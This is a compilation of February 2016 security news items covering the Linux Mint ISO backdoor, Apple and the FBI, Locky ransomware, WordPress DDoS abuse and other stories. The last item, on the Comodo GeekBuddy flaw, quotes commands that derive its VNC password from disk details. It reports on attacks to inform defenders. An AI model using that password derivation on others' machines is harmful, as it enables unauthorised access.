Linux Mint was hacked, website served malicious ISO on Saturday
21.2.2016 Hacking
The Linux Mint website had been hacked, on Saturday, intruders were able to compromise it and serve malicious ISO of Linux Mint 17.3 Cinnamon edition.
The Linux Mint website had been hacked, on Saturday 20th, February, intruders were able to compromise the website serving malicious ISO of Linux Mint 17.3 Cinnamon edition.
The disconcerting announcement was made by Clement Lefebvre, the head of the Linux Mint project. Lefebvre explained that the webLinux Mint website had been compromised and that the hackers used it to distribute a malicious ISO of Linux Mint 17.3 Cinnamon edition.
“I’m sorry I have to come with bad news. We were exposed to an intrusion today. It was brief and it shouldn’t impact many people, but if it impacts you, it’s very important you read the information below. What happened?
Beware of hacked ISOs if you downloaded Linux Mint on February 20th! https://t.co/cexMF2USWS
— Linux Mint (@Linux_Mint) 21 Febbraio 2016
What happened?
Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it.” wrote Clement Lefebvre.
Users that downloaded the Linux Mint 17.3 Cinnamon edition prior to Saturday, or any other version/flavour (including Mint 17.3 Cinnamon via torrent or direct HTTP link), are not affected.
The operators behind the website of the Linux distribution have sanitized it.
Lefebvre urges the users to check the MD5 digest of the downloaded ISOs in order to discover any modification to the legitimate software.
“If you still have the ISO file, check its MD5 signature with the command “md5sum yourfile.iso” (where yourfile.iso is the name of the ISO).” continues the post.
Below the list of valid signatures:
6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso
e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso
30fef1aa1134c5f3778c77c4417f7238 linuxmint-17.3-cinnamon-nocodecs-32bit.iso
3406350a87c201cdca0927b1bc7c2ccd linuxmint-17.3-cinnamon-nocodecs-64bit.iso
df38af96e99726bb0a1ef3e5cd47563d linuxmint-17.3-cinnamon-oem-64bit.iso
“If you still have the burnt DVD or USB stick, boot a computer or a virtual machine offline (turn off your router if in doubt) with it and let it load the live session.
Once in the live session, if there is a file in /var/lib/man.cy, then this is an infected ISO.”
If you have an infected ISO delete it, trash discs used to burn the ISO, and format USB sticks where the ISO was burnt.
If you have installed Linux Mint from an infected ISO follow these steps:
Take the computer offline.
Backup personal data.
Reinstall the OS (with a clean ISO) or format the partition.
And change passwords to sites you used – especially email accounts.
Who is behind the attack?
The hacked ISOs are hosted on a server with the IP 5.104.175.212 and the backdoor connects to the absentvodka.com domain.
The IP and the domain used in the attack lead to 3 people located in Sofia, Bulgaria. It is not clear the roles in the attack..
“What we don’t know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this.” added Clement Lefebvre.
San Bernardino shooter’s Apple ID passcode changed in government custody
21.2.2016 Apple
While discussing the San Bernardino shooter’s iPhone, Apple executives said the password changed while it was under the government custody.
The discussion about the San Bernardino shooter’s iPhone has monopolized media in this week, a US magistrate ordered Apple to help unlock the mobile device, but the company refused to do so.
A new shocking news is circulating on the Internet, according to unnamed Apple executives, the shooter’s Apple ID password changed while it was under government custody causing the block of the access.
The password associated with the Apple ID linked to the San Bernardino shooter’s iPhone was changed less than 24 hours after the feds took possession of the mobile device.
This circumstance made impossible to access a backup of the information the government was seeking.
According to Buzzfeed, the company executives revealed that Apple had been helping federal officials with the investigation when the password change was discovered.
According to Apple, it had been helping the FBI with the investigation since early January 2016, but it seems that the law enforcement contacted the company after attempting to access the iPhone.
“The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a backdoor. One of those methods would have involved connecting the iPhone to a known Wi-Fi network and triggering an iCloud backup that might provide the FBI with information stored to the device between the October 19th and the date of the incident.” states Buzzfeed.
“Apple sent trusted engineers to try that method, the executives said, but they were unable to do it. It was then that they discovered that the Apple ID password associated with the iPhone had been changed. (The FBI claimed earlier Friday that this was done by someone at the San Bernardino Health Department.)”
Just after the dramatic event, an unnamed San Bernardino police official has executed a procedure to reset the Apple ID Passcode associated with Farook’s iPhone.
By default, resetting the Apple ID passcode creates a new device ID linked to the iCloud account that will not automatically sync device data online. The synchronization must be manually configured by the user after he generated the new Apple ID password.
In the case of the terrorist’s iPhone the change of the settings was not possible because already locked and feds were not able to force the sync with Cloud even if they take the device to the known Wi-Fi range.
Now the unique possibility to access the iPhone data consists in pushing an iOS software update that forces the auto-backup of the iPhone to a third party server.
The executives explained that creating a backdoor access to Apple iOS devices represents a serious risk for the privacy of millions of users. It could be used to virtually target any Apple device and open the door to massive surveillance.
Project Cumulus – Tracking fake phished credentials leaked to Dark Web
21.2.2016 Hacking
Project Cumulus – A group of experts at Bitglass used watermarks to track data through the Dark Web and discover how far do phished credentials get.
In April 2015, a group of experts at Bitglass used watermarks to track data through the Deep Web and discover how far does it get after a data breach. The experts discovered that the countries historically associated with cyber criminals activities such as Russia, China and Brazil, were the principal access points for the identity data.
Now the same group of experts published the results of a second research, dubbed Project Cumulus “Where’s Your Data”, aiming to track fake personal data across the Internet.
The researchers created a fake identity for employees of a ghostly retail bank, along with a functional web portal for the financial institution, and a Google Drive account. The experts also associated the identities with real credit-card data, then leaked “phished” Google Apps credentials to the Dark Web and tracked the activity on these accounts.
The results were intriguing, the leaked data were accessed in 30 countries across six continents in just two weeks.
Leaked data were viewed more than 1,000 times and downloaded 47 times, in just 24 hours the experts observed three Google Drive login attempts and five bank login attempts. Within 48 hours of the initial leak, files were downloaded, and the account was viewed hundreds of times over the course of a month, with many hackers successfully accessing the victim’s other online accounts.
“over 1400 hackers viewed the credentials” states the report. “1 in 10 hackers who viewed the credentials attempted to log into the bank web portal” “A torrent of activity resulted within hours of leaking the credentials,
with over 1400 visits from over 30 countries recorded between the Dark Web postings and the bank web portal.”
In 36 percent of the cases, hackers successfully accessed the victim’s other online accounts, 94 percent of hackers who accessed the Google Drive discovered the victim’s other online accounts and attempted to log into the bank’s web portal.
The Project Cumulus revealed that 68 percent of hackers accessed Google Drive and bank portal accounts from the Tor network in order to anonymize their identity online.
“One dark web community member encouraged novice hackers to use Tor in conjunction with a VPN service
purchased using cryptocurrency, warning that any missteps could lead to prosecution under the Computer Fraud and Misuse Act.” continues the report.
The researchers at Bitglass noticed that most of the visitors of the web portal that did not use the Tor network were from Russia (34.85%), United States (15.67%), China (3.5%), Japan (2%).
The Project Cumulus demonstrates the importance of adopting a proper security posture in protecting our data, it highlights the dangers of reusing login credentials and shows how quickly phished credentials can spread, exposing sensitive data.
Malicious spam campaign capitalizes the global interest in the Zika virus
20.2.2016 Spam
The cybercrime ecosystem is getting ready to exploit the media attention on the Zika virus infections for illegal activities. Be careful!
What is the relationship between the Zika virus and a malware? It’s just a matter of opportunity, the cyber crime ecosystem is getting ready to exploit the media attention on current issues for illegal activities. The Zika virus is a Public Health Emergency, as announced on February 1, 2016, by the World Health Organization (WHO). Zika seems to be responsible for birth defects, the population in the Americas were first victims of the virus.
Security experts at Symantec have spotted a malicious spam campaign seeking to exploit the interest in the event.
“Newsworthy events on a regional or global level often provide fertile ground for cybercriminals seeking to capitalize on the interest in these events. In this case, the Zika virus’ impact in countries like Brazil is being leveraged, while the potential impact in other countries make it a prime candidate for more malicious spam.” states a blog post published by Symantec.
Most cases of the Zika virus were reported in Brazil, the same country where cyber security experts have spotted the malicious spam campaign.
The campaign that targeted Brazilians relies on malicious spam email that present to be sent by the Saúde Curiosa (Curious Health), a Brazilian health web portal.
The messages used the following subject:
“ZIKA VIRUS! ISSO MESMO, MATANDO COM ÁGUA!” which translates to: “Zika Virus! That’s Right, killing it with water!”
The text of the message includes buttons and attachments displaying the message “Eliminating Mosquito! Click Here!” and “Instructions To Follow! Download!” as well as a file attachment.
The button redirect victims to the file hosting service Dropbox where experts discovered the same file attached to the spam emails (JS.Downloader) used by crooks to download additional malware onto the infected machine.
Symantec provided the following suggestion to limit the exposure to this specific hacking campaign:
For information about the Zika virus, visit the World Health Organization’s website
Always look for trusted news sources, regionally and globally, for additional information
Avoid clicking on links or opening attachments in unsolicited email messages
Run security software on your computer and ensure that it is up to date
FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable
20.2.2016 Apple
Another Surprising Twist in the Apple-FBI Encryption Case: The Apple ID Passcode Changed while the San Bernardino Shooter's iPhone was in Government Custody.
Yes, the Federal Bureau of Investigation (FBI) has been screwed up and left with no option to retrieve data from iPhone that belonged to San Bernardino shooter Syed Farook.
Apple has finally responded to the Department of Justice (DoJ) court filing that attempts to force Apple to comply with an FBI request to help the feds unlock Farook's iPhone, but Apple refused to do so.
According to Apple, the company had been helping feds with the investigation since early January to provide a way to access Farook's iPhone, but the problem is that the feds approached the company after attempting a 'blunder' themselves.
Here's How the FBI Screwed itself
On October 19, 2015, Roughly six weeks before the San Bernardino terrorist attacks, Syed Farook made a last full iCloud backup of his iPhone 5C, which Apple had already provided to the FBI under a court order.
Now the FBI is looking for the data on Farook's phone stored between October 19, 2015, and the date of the attacks on December 12, which has not been yet synced with Farook's iCloud account.
When the FBI approached Apple to help them brute force the passcode without losing data, Apple suggested the feds an alternative way, i.e., Connect Farook's iPhone to the Internet by taking it to a known Wi-Fi range. This way his phone would have automatically backup device data with his iCloud Account.
But the Twist lies here:
Just after the terrorist attacks, an unnamed San Bernardino police official 'Reset the Apple ID Passcode' associated with Farook's iPhone 5C "less than 24 hours after the government took possession of the device" in an attempt to access the data.
Here's the blunder:
By default, resetting the Apple ID password essentially creates an entirely new device ID on an iCloud account that will not automatically sync device data online, until the user manually configures the newly generated Apple ID password within the device settings.
Unfortunately, Farook's iPhone is already LOCKED, and Apple has already refused to provide a backdoor to bypass the device passcode.
So, the authorities are now left with no chance to pull off the data from iCloud even if they take the device to the known Wi-Fi range.
Here's what a senior Apple executive who requested anonymity told BuzzFeed:
The Apple ID passcode linked to the iPhone belonging to one of the San Bernardino terrorists was changed less than 24 hours after the government took possession of the device, senior Apple executives said Friday. If that hadn't happened, Apple said, a backup of the information the government was seeking may have been accessible…
The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a back door. One of those methods would have involved connecting the phone to a known wifi network.
The statement came just hours after the DoJ criticized Apple's response to the court order.
Possible Alternative Ways to Recover Data
But, there could still be some way out to get the data the FBI needed. One way could be if it is possible for Apple to simply restore the changes made to Farook's iCloud account.
This way the feds could search for known WiFi and get the data automatically synced to the associated iCloud account, unless or until Farook had not turned OFF auto-backup purposely.
Another possible way to recover the data without unlocking the device could be forcefully pushing (if and only if it is possible to install an update without user interaction) an iOS software update to the target device with an additional inbuilt application that will simply auto-backup every file on the system to a third party server.
Donald Trump — Boycott Apple! But Still Tweeting from an iPhone
20.2.2016 Apple
As the groundwork for the presidential election is being cooked up in the United States to be held on 8 November 2016, candidates are very busy in sharpening their skills to gain the vote of reliance.
By struggling to gain an upper hand in the National issues at this moment could benefit the candidates bring them into the limelight and stardom.
Donald Trump (a Presidential Candidate from Republican Party) is not an exception to this.
Recently, Trump made a controversial statement to boycott Apple until the company handovers the San Bernardino terrorist's phone data to the authority; during a rally in South Carolina yesterday.
"First of all, Apple ought to give the security for that phone. What I think you ought to do is boycott Apple until they give that security number," Trump addressed in the rally.
This action was the outcome of the Apple denial to the request of Californian Judge to build a backdoor for the shooter's iPhone.
Also Read: FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable.
Although many politicians have slammed Apple's decision, the company's stand is being backed up by many Big Fishes such as Google, Facebook, Twitter, Whatsapp.
Donald Trump: Boycott Apple
Though Donald Trump's reaction to the Apple's stand against the FBI sounds very aggressive via his tweet, the most interesting fact is that he tweeted the controversial tweet from his iPhone.
As Trump's tweet got an overwhelmed response in the Twitter community, the NSA Whistleblower Edward Snowden made an entry with a gripping statement that read, "can we boycott Trump instead."
Trump earlier called Snowden "Grandstander" and demanded his execution for leaking NSA's illegal activities indirectly, while appearing in a Channel Program called "Fox and Friends" in 2013.
Donald Trump Calls for Apple Boycott
Now, Snowden had his tit for tat through a tweet.
Also Read: Now We Know – Apple Can Unlock iPhones, Here's How to Hack-Proof your Device.
Trump Pledged Not to Use iPhone
Apart from his tweet that said to boycott Apple, Trump had pledged that he would not use his iPhone until Apple gives the data from the terrorist's locked phone to the FBI.
"I use both iPhone & Samsung. If Apple doesn't give info to authorities on the terrorists I'll only be using Samsung until they give info," Trump tweeted.
As Trump had made some headlines with interesting tweets to boost the election campaigns, let's wait whether other candidates are on the same roadway by ballooning the "Apple v/s FBI" issue bigger.
Linux Foundation Launches 'Zephyr', a tiny OS for Internet of Things
20.2.2016 OS
zephyr-rtos-internet-of-things
The 21st century is witnessing a great change over in the daily life of folks with the advent of IoT devices that are capable of talking to each other without any human intervention.
Yeah! Now you do not have to individually cascade an instruction to each of your home devices to accomplish a task. All have gone automated with the actuators and sensors which are infused into the home appliances.
The fact is that your IoT devices would only comply within the family of same manufacturers. For example, if you have a Samsung smart refrigerator, and your wearable device is from Apple or any other vendors, then it couldn't sync as both are from different genres.
No need to worry now!
Zephyr: Future of IoTs
The Linux Foundation has broken all the barriers of compatibility issues by releasing a Real-Time Operating System (RTOS) for Internet of Things devices, dubbed "Zephyr". This OS enables connected devices to communicate with the same protocol.
So, no more digital barricades between your thermostat and your wearable devices, as they could communicate with each other using the same protocols.
The Zephyr project is supported by multiple platforms like NXP Semiconductors, Synopsys, and UbiquiOS Technology and is licensed under Apache 2.0.
Why is Zephyr so important?
internet-of-things-operating-system
Zephyr stands out from the crowd as it provides a scalable, customizable, secure and open source operating system to be used across multiple architectures.
Doing so, Zephyr could help solve many of the current limitations that prevent, so far, Internet of Things from becoming really mainstream.
Zephyr is expected to take the best of both sides: low-consumption as well as speed.
Here's some key points about Zephyr:
Scalability: Universality of Interconnected devices
Umbrella Platform: All smart devices could run under a single roof.
Baby Footprint Kernel: Zephyr kernel can run on 8kb memory devices
Modularity: Supports to integrate 3rd party modules for additional functions as intended by the developer.
Licensing: As startups does not have to bother about any licensing clash, as a unique license file would be mailed to everyone.
Apart from the special features, Zephyr also supports technologies including Bluetooth, Bluetooth Low Energy, IEEE 802.15.4, 6Lowpan, CoAP, IPv4 and IPv6, NFC, Arduino 101, Arduino Due, Intel Galileo' Gen 2, and NXP FRDM-K64F Freedom board.
Security in Mind
Since connected devices are most hack prone items, these devices may malfunction when gets compromised.
However, Linux is more concerned about the Security of Individuals, and generally open source software is considered more secure, as anyone can inspect flaws and debug the code.
For this, the Linux Foundation is maintaining a dedicated security working group and a delegated security maintainer to be available through IRC Chats, so that anyone could help report the vulnerabilities in open discussions.
Although there are many other alternatives available for Internet of Things RTOS like Brillo from Google, Rocket from Intel, and Ubuntu Core from Canonicals, nothing would be as fascinating as Zephyr.
Locky Ransomware uses AES to encrypt Local Files and Unmapped Network Shares
20.2.2016 Virus
Security researchers discovered a strain of ransomware called Locky that uses AES encryption to encrypt local files and files on network shares.
Security researchers have discovered a new piece of ransomware called Locky, which uses AES encryption algorithm to encrypt both local files and files on network shares, even if they are unmapped.
Security experts at BleepingComputer spotted a new strain of ransomware dubbed Locky that encrypts local files and files on network shares by using the AES encryption.
“A new ransomware has been discovered called Locky that encrypts your data using AES encryption and then demands .5 bitcoins to decrypt your files. ” BleepingComputer reports in a blog post.
The experts noticed that Locky is the second ransomware spotted in the last months that is able to encrypt files on unmapped network shares, a trend that results from the availability online of the source code of ransomware like Hidden Tear.
The Locky ransomware is being spread via malicious emails with Word document attachments that pretend to be an invoice, but that includes malicious macros. When the victim enables macros to view the document, it triggers a downloader for the Locky ransomware. The malware is then downloaded from a remote server and executed.
Like the CryptoWall ransomware, Locky uses to change the filenames of encrypted files to make harder data recovery.
When started, Locky creates and assigns a unique 16 hexadecimal number to the infected machine, then he will scan all drives and unmapped network shares for files to encrypt.
The malware uses the AES encryption algorithm and encrypts only file with extensions matching a certain criteria while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).
The Locky ransomware encrypts files renaming the to [unique_id][identifier].locky, the researchers also discovered that the unique ID and other information are embedded at the end of the encrypted file.
The malware will also delete all of the copies of documents in the Shadow Volume, making impossible to restore files.
Locky leaves a ransom note, the _Locky_recover_instructions.txtin, in each folder containing encrypted files.
“Inside the Locky ransom notes are links to a Tor site called the Locky Decrypter Page. This page is located at 6dtxgqam4crv6rr6.onion and contains the amount of bitcoins to send as a payment, how to purchase the bitcoins, and the bitcoin address you should send payment to. Once a victim sends payment to the assigned bitcoin address, this page will provide a decrypter that can be used to decrypt their files.” continues the post.
“Locky will change the Windows wallpaper to %UserpProfile%\Desktop\_Locky_recover_instructions.bmp, which contains the same instructions as the text ransom notes.”
15-year-old Teenage Hacker Arrested Over FBI Computer Hack
19.2.2016 Hacking
Another 15-year-old teenager got arrested from the land of cakes, Scotland, by British Police for breaking into the FBI Systems on 16th February.
Under the Britain’s anti-hacking law, Computer Misuse Act 1990, the boy has been arrested for his role in hacking and unauthorized access to the digital material.
Federal Agents had fled to Glasgow in an attempt to carry out a raid on his home before proceeding with the boy's arrest.
"He has since been released and is the subject of a report to the procurator fiscal," a Police Spokesman told a Scottish journal.
As with the present scenario, reports say that the boy could be extradited to the United States to face the Intrusion and hacking charges.
Second Member of the Hacking Group Arrested
The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.
Another member of the same group got arrested from the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI confidential.
The hacktivist group "Cracka with Attitude" is behind a series of hacks on the United States government and its high-level officials, including:
Leaked the personal and sensitive details of tens of thousands of FBI agents and the US Department of Homeland Security (DHS) employees.
Hacked into AOL emails of CIA director John Brennan.
Hacked into the personal phone accounts and emails of the US spy chief James Clapper.
Broke into AOL emails of the FBI Deputy Director Mark Giuliano.
Last Member of Hacking Group Left
Cracka-with-Attitude
Additionally, it is assumed that only one more member (with a pseudonym "Thwarting Exploits") has been left in the CWA group to get busted, as this got evident from his tweet finalizing the fact that it is a the third member of the group.
Nowadays, the amateurish approach of teenage hackers are hunting down the world's greatest Crime solvers such as FBI and CIA.
The busted cyber criminals are liable to spend their rest of the life behind bars. The cyber laws are strict enough; that it would eat up your whole life years and even beyond your lifetime sometimes.
Now We Know — Apple Can Unlock iPhones, Here's How to Hack-Proof your Device
19.2.2016 Apple
Here's How to Hack-Proof your iOS Device fro Unlock iPhone
Apple has been asked to comply with a federal court order to help the FBI unlock an iPhone 5C by one of the terrorists in the San Bernardino mass shootings that killed 14 and injured 24 in December.
The FBI knows that it can not bypass the encryption on the iPhone, but it very well knows that Apple can make a way out that could help them try more than 10 PINs on the dead shooter's iPhone without getting the device's data self-destructed.
Although Apple refused to comply with the court order and has always claimed its inability to unlock phones anymore, the FBI so cleverly proved that Apple does have a technical way to help feds access data on a locked iOS device.
And this is the first time when Apple has not denied that it can not unlock iPhones, rather it simply refused to build the FBI a Backdoor for the iPhone, in an attempt to maintain its users trust.
So, now we know that Apple is not doing so, but it has the ability to do so.
Now, when you know there are chances that your unlocked iPhone can be accessed by the government even if you have enabled "Auto-Destruct Mode" security feature on your device, you need to protect your iPhone beyond just 4/6-digit passcode.
How to Hack-Proof your iPhone?
Yes, it is possible for you to protect yourself from government snooping just by setting a strong passcode on your iPhone — passcode that the FBI or any government agency would not be able to crack even if they get iPhone backdoor from Apple.
Without wasting much of your time, here's one simple solution:
Simply Set at least random 11-digit numeric passcode for your iPhone.
Here's why (FBI Can't Crack It):
There is only one way, i.e. Brute Force attack, to crack your iPhone passcode. This is what the FBI is demanding from Apple to create a special version of iOS that increases the brute force attempts and ignores the data erasure setting.
iPhones intentionally encrypt its device's data in such a way that one attempt takes about 80 milliseconds, according to Apple.
So, if your iPhone is using a 6-digit passcode and there are 1 Million possible combinations as a whole, it would take maximum time of 22 hours or on average 11 hours to successfully unlock iPhone.
However, if you are using a longer passcode such as a random 11-digit passcode, it will take up to 253 years, and on average 127 years to unlock iPhone.
Doing so will make the FBI or any other agency unable to unlock your iPhone; not unless they have hundreds of years to spare.
To set a strong passcode, click 'Passcode options,' select 'Custom numeric code,' and then enter your new but random passcode.
Things to Avoid While Setting a Passcode
1. Do Not Use a Predictable Passcode: Avoid choosing a predictable string such as your birth dates, phone numbers, or social security numbers, as these are first priorities of attackers to try.
2. Do Not Use iCloud Backups: Avoid using an iCloud backup because doing so will enable the attacker to get a copy of all your iPhone’s data from Apple’s server, where your passcode no longer protects it. This will eliminate the need to guess your passcode.
3. Do Not Use Your Fingerprint: We have seen data breaches that had exposed fingerprints online and also, it is easy to bypass Apple Touch ID Fingerprint scanner. Even fingerprints can be collected from a suspect's corpse. So, using fingerprint security feature could also end up unlocking your iPhone in less time.
So, by choosing a strong passcode, the FBI or any other agency will not be able to unlock your encrypted iPhone, even if they install a vulnerable version of iOS on it.
Warning: You need to remember your passcode, whatever you set, because no one except you would be able to unlock your iPhone. Once you forgot your passcode, there is nothing you can do to get your important data and even access to your iPhone back.
AV-TEST 2015 AWARDs – Which is the best antivirus solutions?
19.2.2016 Virus
2015 awards – For the fifth year in succession the AV-TEST Institute is awarding firms that offered the most efficient IT protection solutions.
On February 17, 2016, the independent institute AV-TEST is awarding the AV-TEST AWARDs to companies who developed antivirus software in 2015. The awards were assigned to products grouped in the categories “PROTECTION”, “PERFORMANCE” , “USABILITY”, “REPAIR” and “ANDROID SECURITY”. The experts divided each category in the user groups of home and corporate users
This is the first time that the AV-TEST awards the most interesting protection solutions in the security industry, the products were tested in the laboratory of the institute throughout the year 2015. The awards are divided into the user groups of home and corporate users
AV-TEST 2015 AWARDS
PROTECTION
The AV-TEST BEST PROTECTION 2015 AWARD is assigned to the best protection software against malware, this year the experts assigned it to Symantec Norton Security for home users, and to Symantec Endpoint Protection in the area of corporate solutions.
PERFORMANCE
The experts analyzed the impact of protection solutions on the speed of a Windows PC and assigned the AV-TEST BEST PERFORMANCE 2015 AWARD in the home user field to the products Bitdefender Internet Security and Kaspersky Internet Security, meanwhile the best corporate solution is Bitdefender Endpoint Security.
USABILITY
Antivirus solutions are becoming even more user-friendly, but experts who tested the different products assigned the AV-TEST BEST USABILITY 2015 AWARD in the area of home users to two products due to a tie score: Avira AntiVirus Pro and Kaspersky Internet Security. The award for the corporate products is assigned to a solution developed by Intel Security with McAfee Endpoint Security.
REPAIR
Which is the best repair tool for Windows systems after a malware attack? The researchers assigned the AV-TEST BEST REPAIR 2015 AWARD to the Avira Antivirus Pro security suite and to the Kaspersky Virus Removal.
ANDROID SECURITY
Let’s close with the best solution to protect Android devices, the experts at AV-Test assigned the AV-TEST BEST ANDROID SECURITY PRODUCT 2015 AWARD to Bitdefender Mobile Security. This solution obtained the best performance throughout all test categories. The second award goes to Sophos Mobile Security.
Thousands of WordPress websites used as a platform to launch DDOS
19.2.2016 Computer Attack
In a recent investigation case, security researchers at Sucuri revealed that 26,000 different WordPress sites were exploited to launch Layer 7 distributed denial of service (DDoS) attacks.
In a recent investigation case, security researchers at Sucuri revealed that 26,000 different WordPress sites were generating a sustained rate of 10,000 to 11,000 HTTPS requests per second against one website, and sometimes even peaked at 20,000. The problem is that any WordPress website could be used to attack the availability of other websites if the pingback feature is enabled (its default setting).
The HTTP flood or Layer 7 attacks would inundate the web server with Layer 7 requests resulting in very large DDoS attacks and disrupt a server by exhausting its resources at the application layer and not at the network layer. They do not require as many requests or as much bandwidth to cause damage; they are able to force a large consumption of memory and CPU on most PHP applications, content management systems (CMS), and databases.
Founder and CTO of Sucuri, Daniel Cid recommends disabling pingbacks on your site. Although It won’t protect you from being attacked, but will stop your site from attacking others.
“The best course of action is to disable pingbacks and if possible, disable xmlrpc altogether if you are not using it. If you are, you can make some very small changes to your .htaccess file to allow only whitelisted IPs to access the file. This might be the case with the popular JetPack plugin.” He said.
Figure 1 Taken from http://www.tweaktown.com/
It has been known for years that the WordPress pingback service can be abused for DDoS attacks mainly because website owners rarely bother to prevent their site from being added to a botnet. Since the attack is coming from thousands of different IP’s, network-based firewalls will do little to stop the attacks as they only do rate limiting per IP address. The researchers discovered that the majority of IP addresses used in this attack were sites hosted on popular VPS/Cloud/Dedicated server providers: Amazon AWS, Digital Ocean, Google Cloud, Microsoft Azure, Hetzner, OVH and Linode.
The researchers discovered that the majority of IP addresses used in this attack were sites hosted on popular VPS/Cloud/Dedicated server providers: Amazon AWS, Digital Ocean, Google Cloud, Microsoft Azure, Hetzner, OVH and Linode.
References:
https://blog.sucuri.net/2016/02/wordpress-sites-leveraged-in-ddos-campaigns.html?utm_campaign=WordPress%20Sites%20Leveraged%20in%20Layer%207%20DDoS%20Campaigns%20blogpost&utm_medium=social&utm_source=linkedin
https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
http://www.securityweek.com/wordpress-sites-used-power-layer-7-ddos-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29
http://news.softpedia.com/news/26-000-wordpress-sites-leveraged-in-layer-7-ddos-attack-500552.shtml
http://www.tweaktown.com/news/50500/26k-wordpress-sites-attacked-clever-layer-7-ddos-attack/index.html
How Just Opening an MS Word Doc Can Hijack Every File On Your System
19.2.2016 Hacking
If you receive a mail masquerading as a company's invoice and containing a Microsoft Word file, think twice before clicking on it.
Doing so could cripple your system and could lead to a catastrophic destruction.
Hackers are believed to be carrying out social engineering hoaxes by adopting eye-catching subjects in the spam emails and compromised websites to lure the victims into installing a deadly ransomware, dubbed "Locky," into their systems.
So if you find .locky extension files on your network shares, Congratulations! You are infected and left with just two solutions: Rebuild your PC from scratch or Pay the ransom.
Locky ransomware is spreading at the rate of 4000 new infections per hour, which means approximately 100,000 new infections per day.
Microsoft MACROS are Back
It is hard to digest the fact that, in this 2016, even a single MS Word document could compromise your system by enabling 'Macros.'
This is where the point to appreciate hacker's sheer brilliance of tactics.
phishing-email-Locky Ransomware
Locky ransomware is being distributed via Microsoft 365 or Outlook in the form of an Invoice email attachment (Word File that embeds vicious macro functions).
The concept of macros dates back to 1990s. You must be familiar with this message: "Warning: This document contains macros."
Now macros are back, as cyber criminals discover a new way to get internet users to open Microsoft Office documents, especially Word files that allow macros to run automatically.
How Does Locky Work?
locky-ransomware-derypt
Once a user opens a malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file and found the content scrambled and a popup that states "enable macros".
Here comes the bad part:
Once the victim enables the macro (malicious), he/she would download an executable from a remote server and run it.
This executable is nothing but the Locky Ransomware that, when started, will begin to encrypt all the files on your computer as well as network.
Locky ransomware affects nearly all file formats and encrypts all the files and replace the filename with .locky extension.
Once encrypted, the ransomware malware displays a message that instructs infected victims to download TOR and visit the attacker's website for further instructions and payments.
Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key.
One of the interesting note on Locky is that it is being translated into many languages, which heighten its attack beyond English boundaries to maximize the digital casualties.
Locky Encrypts Even Your Network-Based Backup Files
The new ransomware also has the capability to encrypt your network-based backup files. So it's time for you to keep you sensitive and important files in a third party storage as a backup plan in order to evade future-ransomware infections.
A researcher named Kevin Beaumont along with Larry Abrahms of BleepingComputer initially discovered the existence of Locky encrypted virus.
To check the impact of Locky, Kevin successfully intercepted the Locky traffic yesterday and realized that the cryptovirus is spreading out rapidly in the wild.
"I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of Million PCs will be infected," Kevin said in a blog post.
One hour of infection Statistics:
locky-ransomware
Among the highly impacted countries include Germany, Netherlands, United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia.
Comodo Internet Security opened your PC to attackers
19.2.2016 Hacking
Comodo Internet Security, in the default configuration, installs an application called GeekBuddy that also installs a VNC server enabled by default.
The hackers of the Google Project Zero Team have found another serious security issue in the Comodo’s protection software, it is a VNC server enabled by default with a password easy to guess. It is the second problem discovered in Comodo solution in less than a month, a few days ago the Google expert Tavis Ormandy discovered a significant flaw in the Chromodo browser. The browser, in fact, has ‘Same Origin Policy’ (SOP) disabled by default, a setting that exposes users at risk.
Every time users install one of the Comodo solutions (Comodo Anti-Virus, Comodo Firewall, and Comodo Internet Security) on a Windows PC a program called GeekBuddy is installed too. This application is used by Comodo to carry out remote technical support on the machine.
The GeekBuddy software installs a VNC server enabled by default and having admin-level privileges. The VNC server open to the local network and is not protected by any authentication mechanism.
Technically, an attacker could gain full control over the computer running the Comodo system.
“Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall, and Comodo Internet Security, runs a passwordless, background VNC server and listens for incoming connections. This can allow for at least local privilege escalation on several platforms. It also may be remotely exploitable via CSRF-like attacks utilizing a modified web-based VNC client (eg. a Java VNC client).” wrote Jeremy Brown in a blog post published on Packet Storm Security.
Users can fix the issue by enabling password protection, but according to Ormandy the passwords were predictable.
“This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn’t prevent the attack they claim it solve” explained Ormandy.
The password is easy to extract from the Windows Registry, the operation could be executed by any logged-in user or by a malware running on the machine.
Ormandy also explained how to calculate the password by using the Win calc.exe.
This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe:
This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this:
$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption SerialNumber Signature TotalTracks
VMware, VMware Virtual S SCSI Disk Device -135723213 1997160
$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
7d4612e5
